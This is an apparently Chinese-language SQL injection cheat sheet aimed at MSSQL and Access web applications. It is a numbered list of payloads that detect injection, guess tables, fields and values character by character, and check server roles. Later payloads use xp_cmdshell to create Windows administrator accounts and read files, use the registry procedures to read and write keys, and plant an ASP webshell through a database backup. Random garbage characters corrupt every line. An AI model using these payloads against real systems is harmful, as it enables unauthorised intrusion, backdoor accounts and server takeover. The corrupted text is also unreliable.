1.判断是否有注入;and 1=1 ;and 1=2 VOj{&O2c��
2.初步判断是否是mssql ;and user>0 23F<��f+2S
vU�X(h.�}8
3.注入参数是字符'and [查询条件] and ''=' �9&>)4HNd?
�Y��~|�C]O
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �o:E_k#Fi
I(c�y<ey+e
5.判断数据库系统 >8pmClVvmR
:2qUel\PEC
;and (select count(*) from sysobjects)>0 mssql ��mr`Lxy9e
3kl<~O|F�s
;and (select count(*) from msysobjects)>0 access K,VN?t��<h
~(B�vI�zzD
C1/<t)��^�
�zSpL�^:�~
6.猜数据库 ;and (select Count(*) from [数据库名])>0 NaR�/IsN8%
��dFu<h �
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 {iyO96YI[^
@�dy�<=bh~
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,r&:C48�dI
VI}�.�MnCa
9.(1)猜字段的ascii值(access)
*$t<H-U�-
F|eK�t/>�e
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ���\Kx@?,�
P�Wwz<AI�+
(2)猜字段的ascii值(mssql) �Slk__eC��
bD&�^-&
�G
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 1kiS."7�7x
`W3;L�TPEb
10.测试权限结构(mssql) M!{;:m28X!
K�%�XQd�Mv
Zd~l_V ��f
IEx`�W;V]K
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [�>B`"nyNQ
iK#5�nY]�.
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- q,ry3Nr�4n
3�6N�ENzK
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �p�wiXA�{�
pe�A}/Jc��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- F~N�m�L�m
�3$.�R=MQ7
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 4`x��.d���
QbF!V%+a's
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- aR
iD}P*V�
Px!M^
T!Pi
;and 1=(select IS_MEMBER('db_owner'));-- �PRs[!�EB6
i��; 8""A�
�"k�Lu]M�<
�d�SD7�(s!
11.添加mssql和系统的帐户 x1�gf�o!BN
�z�!z+E%H^
;exec master.dbo.sp_addlogin username;-- O�4Wn+$AN
;exec master.dbo.sp_password null,username,password;-- �6D[m}/?Uy
;*3O�kNxa3
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �(QO�8��_�
$.�a�4�Og2
;exec master.dbo.xp_cmdshell 'net user username password x�q?9��w�$
� d"E@e21�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �
H %C�b
n9Mi?�#xIp
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �>S3,�_@C�
,a:!"Z^��f
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- K�m5#$IiP;
O�rb('Z,-3
$VWe��o#b�
#�]�.�n0�[
12.(1)遍历目录 @�Axw�j���
IZ<�d~ �[y
;create table dirs(paths varchar(100), id int) I�g9g�GI,�
�$6W o$�c%
;insert dirs exec master.dbo.xp_dirtree 'c:\' T��-�0[P;�
+��=XDNS�w
;and (select top 1 paths from dirs)>0 �QAp��+LSm
HFJna�2B�`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &f}a`�/�{@
]Iku(<*Ya�
�rf2+~B{$,
Q(P'�4XCm
(2)遍历目录 >~;MQDU5*Y
y�fBVy8S�m
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �4�LO �U[D
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 yP�gDb[�V+
qIbp��0`�m
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 6} DGEHc�1
=j%B`cJ66_
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 o�"O=Epg��
a�?LrS�k`�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ?tW�cx;h:>
��k{*�I��R
~$#�"'Tl4J
f0�uzoeL<%
13.mssql中的存储过程 CNC3">Dk~9
jv��:!v�i:
xp_regenumvalues 注册表根键, 子键 �6�m#V=4e*
����8>Y���
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��vqq7IV)|
gW{<:�6}!*
xp_regread 根键,子键,键值名 ��jO�J�$QT
!�.�\EU*)1
;exec xp_regread �(�x}�>�tm
m��v�7>�<C
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Hzr<i4Y=w9
\a:#e%]qz9
xp_regwrite 根键,子键, 值名, 值类型, 值 H%,�jB<-.A
�(=v� :@\r
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 "<c^`#CWuO
jo�75�M�Sj
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ^;";f�r
Vw
�sFqLxSo_I
xp_regdeletevalue 根键,子键,值名 �f�f.(��X!
��~F�?vf@k
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `�Yk~2t"V�
n�z7�2�w_
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ` ZO���#n�
oF1{�/ER�S
LR�F_w)^['
f�j2pD Cic
14.mssql的backup创建webshell \�Tf$i(0q
G�Z�xM44fP
use model ?�F�{sym@i
q=��N�I}�k
create table cmd(str image); #�fq%903=
>s�
�4�"2X
insert into cmd(str) values (''); ~U�] "�dbQ
m3M�o2�};?
backup database model to disk='c:\l.asp'; _lWC�)bv�`
)
>_xHc�?
�?gk���nJ:
_a��;E> �
15.mssql内置函数 A��1b<��/2
�(0L7�Ivg<
;and (select @@version)>0 获得Windows的版本号 UK��YQ @�m
v"�nN�[_T�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa '��q�1�58x
4��&��r5M
;and (select user_name())>0 爆当前系统的连接用户 s�K)��fE�x
_?j�66-(
Q
;and (select db_name())>0 得到当前连接的数据库 �bYPkqitqz
_n�6g�e*,E
�
Ha�Js�)j
�L1�'�PQV�
16.简洁的webshell Ba��n�@$uf
?��v�mu,y�
use model ��}ufzlH�D
Hrj�ry$t/J
create table cmd(str image); Ac�Z�{�B�<
�~�lBb%M
insert into cmd(str) values (''); �g=G��d�|�
_&(\>�{p�m
backup database model to disk='g:\wwwtest\l.asp';
